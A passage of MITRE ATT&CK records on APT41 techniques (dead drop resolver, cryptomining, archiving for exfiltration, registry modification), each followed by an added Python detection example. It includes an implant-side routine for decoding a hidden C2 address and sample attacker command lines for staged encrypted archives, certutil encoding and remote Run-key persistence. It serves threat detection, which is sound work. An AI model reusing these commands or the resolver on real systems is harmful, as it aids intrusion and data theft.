Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
|
||
|
||
Use of a dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).
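The description above covers the mechanism in prose. The following is an added example, not code from the ATT&CK page or from the FireEye APT41 reporting, that shows both halves of it in Python: how an implant recovers a C2 endpoint hidden in an otherwise innocuous page, and a proxy-log heuristic that flags non-browser fetches of the services named above. The marker strings, XOR key, page text, proxy-log layout and every host, URL and user agent are constructed for the example; 203.0.113.7 is a TEST-NET address.

```python
import base64
import re
from urllib.parse import urlparse

# Constructed example. The marker strings and XOR key are assumptions made for this
# demonstration; a real resolver uses whatever encoding its author chose.
MARKER_START, MARKER_END = "[[", "]]"
XOR_KEY = 0x2A


def encode_ddr_payload(c2: str, key: int = XOR_KEY) -> str:
    """Embed a C2 endpoint the way a dead drop page might: XOR, base64, wrap in markers."""
    obfuscated = bytes(b ^ key for b in c2.encode())
    return MARKER_START + base64.b64encode(obfuscated).decode() + MARKER_END


def resolve_c2(page_body: str, key: int = XOR_KEY) -> list:
    """Implant side: pull every marker-delimited blob out of an innocuous page,
    base64-decode it and strip the XOR layer to recover the real C2 endpoint."""
    pattern = re.escape(MARKER_START) + r"([A-Za-z0-9+/=]+)" + re.escape(MARKER_END)
    endpoints = []
    for blob in re.findall(pattern, page_body):
        try:
            raw = base64.b64decode(blob, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        endpoints.append(bytes(b ^ key for b in raw).decode(errors="replace"))
    return endpoints


# Constructed "dead drop" page: bland text on a public paste or code-hosting site
# with the endpoint (a TEST-NET address) hidden in the middle.
SAMPLE_PAGE = ("Build notes, week 32: no changes to report. "
               + encode_ddr_payload("203.0.113.7:443")
               + " Please file issues on the tracker.")

# Detection side. Legitimate services the technique text and the APT41 relationship
# name as resolvers, matched on the request hostname.
RESOLVER_HOSTS = {"pastebin.com", "raw.githubusercontent.com",
                  "gist.githubusercontent.com", "social.technet.microsoft.com"}
BROWSER_UA = re.compile(r"Mozilla/|Chrome/|Safari/|Firefox/|Edg/")
# Assumed proxy log layout: <timestamp> <source host> "<user agent>" <url>
PROXY_LINE = re.compile(r'^(?P<ts>\S+) (?P<src>\S+) "(?P<ua>[^"]*)" (?P<url>\S+)$')


def flag_resolver_fetches(log_lines) -> list:
    """Return (source host, url) for fetches of resolver-capable services by a
    non-browser client. Browsers hit these sites all day; implants rarely bother
    to imitate a browser user agent, which is the signal used here."""
    flagged = []
    for line in log_lines:
        m = PROXY_LINE.match(line)
        if not m:
            continue
        host = (urlparse(m["url"]).hostname or "").lower()
        if host in RESOLVER_HOSTS and not BROWSER_UA.search(m["ua"]):
            flagged.append((m["src"], m["url"]))
    return flagged


# Constructed proxy log lines.
SAMPLE_PROXY_LOG = [
    '2019-08-07T10:00:01Z ws-042 "Mozilla/5.0 (Windows NT 10.0) Chrome/76.0.3809.100" '
    'https://raw.githubusercontent.com/example-org/tooling/master/README.md',
    '2019-08-07T10:00:09Z ws-017 "WinHttp.WinHttpRequest.5" https://pastebin.com/raw/Ab12Cd34',
    '2019-08-07T10:00:10Z ws-017 "WinHttp.WinHttpRequest.5" '
    'https://social.technet.microsoft.com/profile/example-user/',
    '2019-08-07T10:00:12Z ws-003 "curl/7.64.1" https://example.org/update.json',
]

if __name__ == "__main__":
    print("resolved C2:", resolve_c2(SAMPLE_PAGE))
    for src, url in flag_resolver_fetches(SAMPLE_PROXY_LOG):
        print(f"suspicious resolver fetch from {src}: {url}")
```

The detection heuristic is deliberately narrow and still noisy: update agents and scripts also fetch raw GitHub content without a browser user agent, so it belongs behind a baseline of which hosts normally talk to these services, and the same URL fetched at a fixed interval is a stronger signal than any single request.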
|
||
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='command-and-control')]
|
||
technique_id : T1102.001
|
||
matrix : mitre-attack
|
||
platform : ['Linux', 'macOS', 'Windows']
|
||
data_sources : ['Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow']
|
||
permissions_required : ['User']
|
||
----------------------------------------------------------------------------------------------------
|
||
type : intrusion-set
|
||
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
|
||
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
created : 2019-09-23T13:43:36.945Z
|
||
modified : 2023-03-23T15:45:58.846Z
|
||
name : APT41
|
||
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
|
||
|
||
aliases : ['APT41', 'Wicked Panda']
|
||
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
|
||
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
|
||
x_mitre_attack_spec_version : 3.1.0
|
||
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
|
||
x_mitre_deprecated : False
|
||
x_mitre_domains : ['enterprise-attack']
|
||
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
x_mitre_version : 3.1
|
||
technique_ref : attack-pattern--cd25c1b4-935c-4f0e-ba8d-552f28bc4783
|
||
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) deployed a Monero cryptocurrency mining tool in a victim’s environment.(Citation: FireEye APT41 Aug 2019)
|
||
relationship_id : relationship--9ebc2d8a-a945-4b5d-805f-56e16bcc6676
|
||
revoked : False
|
||
technique : Resource Hijacking
|
||
technique_description : Adversaries may leverage the resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability.
|
||
|
||
One common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood Blog 2017) Servers and cloud-based systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining.(Citation: CloudSploit - Unused AWS Regions) Containerized environments may also be targeted due to the ease of deployment via exposed APIs and the potential for scaling mining activities by deploying or compromising multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro Exposed Docker APIs)
|
||
|
||
Additionally, some cryptocurrency mining malware identifies and then kills off processes belonging to competing malware to ensure it is not competing for resources.(Citation: Trend Micro War of Crypto Miners)
|
||
|
||
Adversaries may also use malware that leverages a system's network bandwidth as part of a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498) campaigns and/or to seed malicious torrents.(Citation: GoBotKR) Alternatively, they may engage in proxyjacking by selling use of the victims' network bandwidth and IP address to proxyware services.(Citation: Sysdig Proxyjacking)
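As an added example, not from the page or from the FireEye report, the Python below scores process command lines for the traces a Monero miner such as the one in the APT41 relationship tends to leave: a stratum pool URL, a wallet address with the Monero base58 shape, a RandomX/CryptoNight algorithm name and the option names XMRig uses. The option names are real XMRig flags; the weights, threshold, pool hostnames, file paths and the wallet string are constructed.

```python
import re

# Indicators of XMRig-style CPU miners. Option names are real XMRig flags; weights,
# threshold, pool names, paths and the wallet string below are constructed.
STRATUM_RE = re.compile(r"stratum\+(?:tcp|ssl)://\S+", re.I)
ALGO_RE = re.compile(r"(?<!\S)(?:rx/0|rx/wow|cn/r|cn-heavy|randomx)(?!\S)", re.I)
# Standard Monero address: 95 chars, first char 4 (primary) or 8 (subaddress), Monero
# base58 alphabet (no 0, O, I, l). 106-char integrated addresses are not handled.
B58 = "1-9A-HJ-NP-Za-km-z"
XMR_ADDR_RE = re.compile(rf"(?<![{B58}])[48][{B58}]{{94}}(?![{B58}])")
POOL_PORTS = {3333, 4444, 5555, 7777, 14444}          # commonly seen pool ports
MINER_FLAGS = {"--donate-level": 3, "--cpu-priority": 2, "--nicehash": 2, "--rig-id": 2,
               "--coin": 1, "--algo": 1, "-a": 1, "-o": 1, "-u": 1, "-p": 1, "-k": 1}
URL_PORT_RE = re.compile(r"(?:^|\s)(?:-o|--url)[=\s]+\S*?:(\d{2,5})(?=\s|$)")


def score_command_line(cmdline: str):
    """Additive score plus reasons. Generic short flags (-o/-u/-p/-k) score 1 each so
    curl, ssh or a real svchost.exe stay well under the threshold on their own."""
    score, reasons = 0, []

    def hit(points: int, reason: str):
        nonlocal score
        score += points
        reasons.append(reason)

    if STRATUM_RE.search(cmdline):
        hit(5, "stratum URL")
    if XMR_ADDR_RE.search(cmdline):
        hit(4, "Monero wallet address")
    if ALGO_RE.search(cmdline):
        hit(3, "RandomX/CryptoNight algorithm")
    for tok in cmdline.split():
        flag = tok.split("=", 1)[0]
        if flag in MINER_FLAGS:
            hit(MINER_FLAGS[flag], f"flag {flag}")
    m = URL_PORT_RE.search(cmdline)
    if m and int(m.group(1)) in POOL_PORTS:
        hit(2, f"pool port {m.group(1)}")
    return score, reasons


def triage(events, threshold: int = 6) -> list:
    """Events whose command line scores at or above the threshold, with reasons."""
    out = []
    for ev in events:
        score, reasons = score_command_line(ev["cmdline"])
        if score >= threshold:
            out.append({**ev, "score": score, "reasons": reasons})
    return out


FAKE_WALLET = "4" + "7Bq" * 31 + "X"   # 95 chars in the Monero alphabet; not a real wallet

# Constructed process-creation events (Sysmon event 1 / auditd EXECVE style fields).
SAMPLE_EVENTS = [
    {"host": "srv-db01", "image": r"C:\Windows\Temp\svchost.exe",
     "cmdline": rf"C:\Windows\Temp\svchost.exe -o stratum+tcp://pool.example.net:3333 "
                rf"-u {FAKE_WALLET} -p x -k --donate-level 1"},
    {"host": "srv-db01", "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs -p -s Schedule"},
    {"host": "k8s-node-3", "image": "/tmp/.x/kworker",
     "cmdline": f"/tmp/.x/kworker -a rx/0 -o xmr.example.org:14444 --cpu-priority 5 "
                f"-u {FAKE_WALLET}.rig1"},
    {"host": "ws-112", "image": "/usr/bin/curl",
     "cmdline": "curl -o /tmp/update.tgz https://example.org/update.tgz"},
]

if __name__ == "__main__":
    for hit_ev in triage(SAMPLE_EVENTS):
        print(f"{hit_ev['host']}: {hit_ev['image']} score={hit_ev['score']} {hit_ev['reasons']}")
```

Command lines are the cheapest signal but not the only one: miners are routinely renamed to look like svchost.exe or a kernel thread, so an image path that does not fit the name (svchost.exe outside System32, a kworker with an on-disk path) and sustained CPU from the Sensor Health data source should be correlated with the score rather than alerting on either alone.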
|
||
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='impact')]
|
||
technique_id : T1496
|
||
matrix : mitre-attack
|
||
platform : ['Windows', 'IaaS', 'Linux', 'macOS', 'Containers']
|
||
data_sources : ['Network Traffic: Network Traffic Flow', 'File: File Creation', 'Network Traffic: Network Connection Creation', 'Sensor Health: Host Status', 'Process: Process Creation', 'Command: Command Execution']
|
||
----------------------------------------------------------------------------------------------------
|
||
type : intrusion-set
|
||
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
|
||
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
created : 2019-09-23T13:43:36.945Z
|
||
modified : 2023-03-23T15:45:58.846Z
|
||
name : APT41
|
||
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
|
||
|
||
aliases : ['APT41', 'Wicked Panda']
|
||
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
|
||
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
|
||
x_mitre_attack_spec_version : 3.1.0
|
||
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
|
||
x_mitre_deprecated : False
|
||
x_mitre_domains : ['enterprise-attack']
|
||
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
x_mitre_version : 3.1
|
||
technique_ref : attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662
|
||
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) created a RAR archive of targeted files for exfiltration.(Citation: FireEye APT41 Aug 2019)
|
||
relationship_id : relationship--89328749-11c5-416d-99b9-f3039afc487a
|
||
revoked : False
|
||
technique : Archive via Utility
|
||
technique_description : Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration. Many utilities include functionalities to compress, encrypt, or otherwise package data into a format that is easier/more secure to transport.
|
||
|
||
Adversaries may abuse various utilities to compress or encrypt data before exfiltration. Some utilities may already be present on the system, such as <code>tar</code> on Linux and macOS or <code>zip</code> on Windows systems.
|
||
|
||
On Windows, <code>diantz</code> or <code>makecab</code> may be used to package collected files into a cabinet (.cab) file. <code>diantz</code> may also be used to download and compress files from remote locations (i.e., [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002)).(Citation: diantz.exe_lolbas) <code>xcopy</code> on Windows can copy files and directories with a variety of options. Additionally, adversaries may use [certutil](https://attack.mitre.org/software/S0160) to Base64 encode collected data before exfiltration.
|
||
|
||
Adversaries may also use third-party utilities, such as 7-Zip, WinRAR, and WinZip, to perform similar activities.(Citation: 7zip Homepage)(Citation: WinRAR Homepage)(Citation: WinZip Homepage)
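The paragraphs above list the utilities. As an added example, not from the page or its citations, the Python below classifies process command lines for those utilities the way a responder wants them summarised: which tool, whether the archive was password-protected (rar -hp/-p, 7z -p, zip -e/-P), where it was written, whether certutil was encoding rather than archiving, and whether diantz or makecab pulled its source from a UNC path. The command lines, paths, share names and passwords are constructed; the option semantics are those of the real tools.

```python
import re
from typing import Optional

# Directories archives are commonly staged in before exfiltration (assumption for
# this example; tune to the environment).
STAGING_HINTS = ("\\windows\\temp\\", "\\appdata\\local\\temp\\", "\\programdata\\",
                 "\\users\\public\\", "$recycle.bin\\", "/tmp/", "/var/tmp/", "/dev/shm/")


def _tokens(cmdline: str) -> list:
    """Split a command line, keeping quoted Windows paths as one token."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def _first_positional(args, flag_prefix: str) -> Optional[str]:
    return next((a for a in args if not a.startswith(flag_prefix)), None)


def classify_archiving(cmdline: str) -> Optional[dict]:
    """Recognise archive/encode commands and pull out what a responder asks first:
    tool, password protection, output location, remote source. Returns None for
    non-archiving commands (7z x, reg query, svchost ...)."""
    toks = _tokens(cmdline)
    if not toks:
        return None
    tool = re.split(r"[\\/]", toks[0])[-1].lower()
    args = toks[1:]
    r = {"tool": tool, "encrypted": False, "encoded": False, "remote_source": False, "output": None}

    if tool in {"rar.exe", "winrar.exe", "rar"}:
        if not args or args[0].lower() not in {"a", "u", "m"}:   # add / update / move into archive
            return None
        r["encrypted"] = any(a.startswith(("-hp", "-p")) for a in args[1:])  # -hp also encrypts headers
        r["output"] = _first_positional(args[1:], "-")
    elif tool in {"7z.exe", "7za.exe", "7zr.exe", "7z"}:
        if not args or args[0].lower() != "a":
            return None
        r["encrypted"] = any(a.startswith("-p") for a in args[1:])
        r["output"] = _first_positional(args[1:], "-")
    elif tool in {"makecab.exe", "diantz.exe"}:
        if any(a.lower() == "/f" for a in args):
            r["output"] = None          # output is named inside the .ddf directive file; not parsed here
        else:
            positional = [a for a in args if not a.startswith("/")]
            if len(positional) < 2:
                return None
            r["remote_source"] = positional[0].startswith("\\\\")   # UNC source: remote staging
            r["output"] = positional[-1]
    elif tool == "certutil.exe":
        if not any(a.lower() in {"-encode", "-encodehex"} for a in args):
            return None
        r["encoded"], r["output"] = True, args[-1]
    elif tool in {"tar", "tar.exe"}:
        flags = args[0] if args else ""
        # short-option cluster only (-czf, cf); long options such as --create are not handled
        if not re.fullmatch(r"-?[A-Za-z]+", flags) or "c" not in flags or "f" not in flags:
            return None
        r["output"] = args[1] if len(args) > 1 else None
    elif tool in {"zip", "zip.exe"}:
        r["encrypted"] = any(a == "-e" or a.startswith("-P") for a in args)
        r["output"] = _first_positional(args, "-")
    else:
        return None

    r["staged"] = any(h in (r["output"] or "").lower() for h in STAGING_HINTS)
    return r


def triage(cmdlines) -> list:
    """Classified archiving commands, in order of appearance."""
    return [c for c in (classify_archiving(x) for x in cmdlines) if c]


# Constructed process-creation command lines.
SAMPLE_CMDLINES = [
    r'rar.exe a -hp"Str0ngP@ss" -r C:\ProgramData\1.rar "C:\Users\jdoe\Documents\Finance"',
    r'7z.exe a -t7z -mhe=on -pS3cret C:\Users\Public\backup.7z D:\Share\HR',
    r'diantz.exe \\fileserver\finance\ledger.xlsx C:\Windows\Temp\l.cab',
    r'certutil.exe -encode C:\Windows\Temp\l.cab C:\Windows\Temp\l.txt',
    'tar -czf /tmp/.cache.tgz /home/app/config',
    r'7z.exe x C:\Users\jdoe\Downloads\update.7z',
    r'C:\Windows\System32\svchost.exe -k netsvcs',
]

if __name__ == "__main__":
    for c in triage(SAMPLE_CMDLINES):
        print(c)
```

Keep the output path: an archive landing in ProgramData or a temp directory, followed shortly by an outbound transfer from the same host, is the sequence to look for, and the RAR archive in the APT41 relationship above would surface here as tool rar.exe with a staged output.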
|
||
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='collection')]
|
||
technique_id : T1560.001
|
||
matrix : mitre-attack
|
||
platform : ['Linux', 'macOS', 'Windows']
|
||
data_sources : ['Process: Process Creation', 'Command: Command Execution', 'File: File Creation']
|
||
----------------------------------------------------------------------------------------------------
|
||
type : intrusion-set
|
||
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
|
||
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
created : 2019-09-23T13:43:36.945Z
|
||
modified : 2023-03-23T15:45:58.846Z
|
||
name : APT41
|
||
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
|
||
|
||
aliases : ['APT41', 'Wicked Panda']
|
||
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
|
||
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
|
||
x_mitre_attack_spec_version : 3.1.0
|
||
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
|
||
x_mitre_deprecated : False
|
||
x_mitre_domains : ['enterprise-attack']
|
||
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
x_mitre_version : 3.1
|
||
technique_ref : attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4
|
||
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used a malware variant called GOODLUCK to modify the registry in order to steal credentials.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
|
||
relationship_id : relationship--c8475b1b-c98f-4fdc-89dd-c9b04e6fbd9c
|
||
revoked : False
|
||
technique : Modify Registry
|
||
technique_description : Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
|
||
|
||
Access to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API.
|
||
|
||
Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API. (Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding Reg Jul 2017)
|
||
|
||
The Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) for RPC communication.
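As an added example, not the page's or FireEye's code, the Python below covers the two points of the description that a detection engineer can actually test for: reg.exe writes aimed at a remote machine, including the caveat that only HKLM and HKU are reachable that way, and key names with an embedded NUL, which the native API accepts but Win32-based tools such as Reg cannot read. The command lines and registry events are constructed; the NUL check assumes a sensor that records the raw key name rather than a Win32-truncated one.

```python
import re
from typing import Optional

# reg.exe sub-commands that write; query, compare, export and save only read.
REG_WRITE_OPS = {"add", "delete", "copy", "restore", "load", "unload", "import"}
# reg.exe can only reach HKLM and HKU on a remote machine.
REMOTE_HIVES = {"HKLM", "HKEY_LOCAL_MACHINE", "HKU", "HKEY_USERS"}
REMOTE_KEY_RE = re.compile(r"^\\\\(?P<host>[^\\]+)\\(?P<key>.+)$")


def is_pseudo_hidden(key_path: str) -> bool:
    """True when a key component embeds a NUL or another control character.
    The native API accepts such names, but Win32 callers treat the string as ending
    at the first NUL, so Reg and regedit cannot open or display the key. Assumes the
    sensor exposes the raw key name rather than a Win32-truncated one."""
    return any(ch < " " for component in key_path.split("\\") for ch in component)


def parse_reg_command(cmdline: str) -> Optional[dict]:
    """Op, target host, hive/key and value name from a reg.exe write command."""
    toks = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]
    if len(toks) < 3 or re.split(r"[\\/]", toks[0])[-1].lower() not in {"reg", "reg.exe"}:
        return None
    op = toks[1].lower()
    if op not in REG_WRITE_OPS:
        return None
    host, key = None, toks[2]
    m = REMOTE_KEY_RE.match(key)
    if m:
        host, key = m["host"], m["key"]
    hive = key.split("\\", 1)[0].upper()
    lowered = [t.lower() for t in toks]
    value = None
    if "/v" in lowered:
        i = lowered.index("/v")
        value = toks[i + 1] if i + 1 < len(toks) else None
    return {"op": op, "remote_host": host, "hive": hive, "key": key, "value": value,
            "remote_hive_allowed": host is None or hive in REMOTE_HIVES}


def triage(cmdlines, reg_events) -> list:
    """Remote registry writes from command lines; NUL-hidden keys from sensor events."""
    findings = []
    for c in cmdlines:
        p = parse_reg_command(c)
        if p and p["remote_host"]:
            note = "" if p["remote_hive_allowed"] else " (hive not reachable remotely; would fail)"
            findings.append(f"remote registry {p['op']} on {p['remote_host']}: {p['key']}{note}")
    for ev in reg_events:
        if is_pseudo_hidden(ev["key"]):
            findings.append(f"pseudo-hidden key on {ev['host']}: {ev['key']!r}")
    return findings


# Constructed process command lines.
SAMPLE_CMDLINES = [
    r"reg add \\SRV-FILE01\HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "
    r'/v Updater /t REG_SZ /d "C:\ProgramData\u.exe" /f',
    r"reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    r"C:\Windows\System32\reg.exe delete HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Security /f",
    r"reg add \\SRV-FILE01\HKCU\Software\Example /v x /d 1 /f",
    r"notepad.exe C:\notes.txt",
]

# Constructed registry-create events as a kernel-level sensor might record them; the
# second key name embeds a NUL, so Win32 tooling would show its parent as empty.
SAMPLE_REG_EVENTS = [
    {"host": "ws-017", "key": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost"},
    {"host": "ws-017", "key": "HKLM\\SOFTWARE\\Classes\\Lic\x00ense"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_CMDLINES, SAMPLE_REG_EVENTS):
        print(f)
```

A remote reg.exe write is worth an alert on its own in most environments, since administrators rarely manage the registry that way; pair it with the Network Traffic Flow data source (SMB to the target host from the same source) to confirm the RPC path the description mentions.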
|
||
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
|
||
technique_id : T1112
|
||
matrix : mitre-attack
|
||
platform : ['Windows']
|
||
data_sources : ['Windows Registry: Windows Registry Key Modification', 'Process: OS API Execution', 'Network Traffic: Network Traffic Flow', 'Command: Command Execution', 'Windows Registry: Windows Registry Key Deletion', 'Windows Registry: Windows Registry Key Creation', 'Process: Process Creation']
|
||
----------------------------------------------------------------------------------------------------
|
||
type : intrusion-set
|
||
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
|
||
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
created : 2019-09-23T13:43:36.945Z
|
||
modified : 2023-03-23T15:45:58.846Z
|
||
name : APT41
|
||
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
|
||
|
||
aliases : ['APT41', 'Wicked Panda']
|
||
